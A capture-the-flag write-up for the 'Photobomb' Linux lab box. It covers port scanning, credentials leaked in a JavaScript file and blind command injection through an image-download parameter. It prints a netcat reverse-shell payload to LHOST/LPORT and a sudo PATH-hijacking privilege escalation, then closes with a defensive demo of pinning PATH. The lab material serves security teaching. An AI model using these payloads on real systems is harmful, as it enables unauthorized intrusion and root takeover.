Box: Photobomb
Level: Easy
OS: Linux
Let's get started
Recon
Port Scanning
command: sudo nmap -A -v -p- -T4 10.129.228.60
Nmap scan report for 10.129.228.60
Host is up, received conn-refused (0.22s latency).
Scanned at 2023-11-03 11:35:47 WAT for 17s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
| 256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBrVE9flXamwUY+wiBc9IhaQJRE40YpDsbOGPxLWCKKjNAnSBYA9CPsdgZhoV8rtORq/4n+SO0T80x1wW3g19Ew=
| 256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEp8nHKD5peyVy3X3MsJCmH/HIUvJT+MONekDg5xYZ6D
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:36
Completed NSE at 11:36, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:36
Completed NSE at 11:36, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:36
Completed NSE at 11:36, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.44 seconds
From our scan we have 2 open ports: port 22, which runs SSH, and port 80, which runs the HTTP service (nginx, redirecting to http://photobomb.htb/). We'll focus our enumeration today on port 80
Enumeration
Navigate to the webpage
Add this domain name (photobomb.htb) to your /etc/hosts file
Navigate to the webpage again,
Checking the page source you should see a JavaScript file
Yeah, let's view the content of this file
Now, that looks like creds
Something like
username:pH0t0
password:b0Mb!
Clicking on 'click here' redirects you to the /printer directory, which requires creds to log in; we'll be using the creds we found in the JavaScript file
nice nice, we are logged in
This webpage just allows us to download an image so we can print it
Let's try to download an image, but this time we'll capture the request using Burp Suite and send it over to Burp Repeater
We can see there are 3 parameters: photo, filetype and dimensions
The filetype parameter is actually vulnerable to blind command injection (the server passes it to a shell without validation, so we only observe side effects such as a delay, not command output). Let's exploit this
Exploitation
Let's try to cause a 10 second delay to confirm the injection
payload:;ping+-c+10+127.0.0.1
This actually caused a 10 second delay
Let's spawn a reverse shell with this
payload:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc LHOST LPORT >/tmp/f
Ensure you edit the LHOST and LPORT; also ensure the payload is URL-encoded before sending it
Checking my netcat listener
nice nice, let's stabilize our shell
python3 -c "import pty;pty.spawn('/bin/bash')"
ctrl + z (To Background)
stty raw -echo && fg
export TERM=xterm
We can go ahead now to escalate our privileges
Privilege Escalation
Running the sudo -l command
This user can run this script with sudo privileges.
Let's view the content of the script
From the above screenshot we know where the photobomb.log files are stored. We can also see that the script calls its commands without an 'absolute path'. Therefore we can take advantage of a PATH hijacking approach: place our own binary earlier in the search path so the script runs it instead of the real one.
Navigate to the /tmp dir; since the script calls 'find' by name, we create our own 'find' there and prepend /tmp to the PATH when running the script with sudo.
echo bash > find
chmod 777 find
sudo PATH=$PWD:$PATH /opt/cleanup.sh
We were able to spawn a root shell.
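To show exactly why the cleanup script fell to this and how a script author closes the hole, here is an added example (not the box's /opt/cleanup.sh, whose text is only in the screenshot): a bare `find` call resolved through a caller-supplied PATH, beside the same call with PATH pinned inside the script. The sandbox directories, the log file and the impostor `find` (which only prints a marker) are constructed for the demo.

```shell
#!/bin/sh
# Added example: a script that calls "find" by bare name resolves it through the
# caller's PATH, so a caller who may set PATH (as sudo allowed here) decides
# which "find" runs. Pinning PATH inside the script removes that choice.

# Constructed sandbox: a logs dir with one log file, plus a bin dir holding an
# impostor "find" that only prints a marker so the hijack is observable.
make_sandbox() {
    root=$(mktemp -d)
    mkdir "$root/logs" "$root/bin"
    : > "$root/logs/photobomb.log"
    printf '#!/bin/sh\necho HIJACKED\n' > "$root/bin/find"
    chmod 755 "$root/bin/find"
    echo "$root"
}

# Vulnerable pattern: bare "find", PATH inherited from whoever invoked us.
cleanup_unpinned() {
    find "$1" -name '*.log' -type f
}

# Hardened pattern: PATH is reset to trusted system dirs before any command
# runs (subshell body, so the caller's environment is left untouched). On top
# of this, the sudoers rule should keep secure_path and not grant SETENV.
cleanup_pinned() (
    PATH=/usr/bin:/bin
    export PATH
    find "$1" -name '*.log' -type f
)

# Drive both with an attacker-style PATH prepended, as the write-up does with
# "sudo PATH=$PWD:$PATH /opt/cleanup.sh". Each run is a command substitution,
# so the modified PATH never leaks out. Returns 0 only if the pinned variant
# resisted the hijack while the unpinned one ran the impostor.
demo() {
    root=$(make_sandbox)
    unpinned=$(PATH="$root/bin:$PATH"; export PATH; cleanup_unpinned "$root/logs")
    pinned=$(PATH="$root/bin:$PATH"; export PATH; cleanup_pinned "$root/logs")
    echo "unpinned: $unpinned"
    echo "pinned:   $pinned"
    rm -rf "$root"
    [ "$unpinned" = HIJACKED ] && [ "$pinned" = "$root/logs/photobomb.log" ]
}

demo
```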
That will be all for today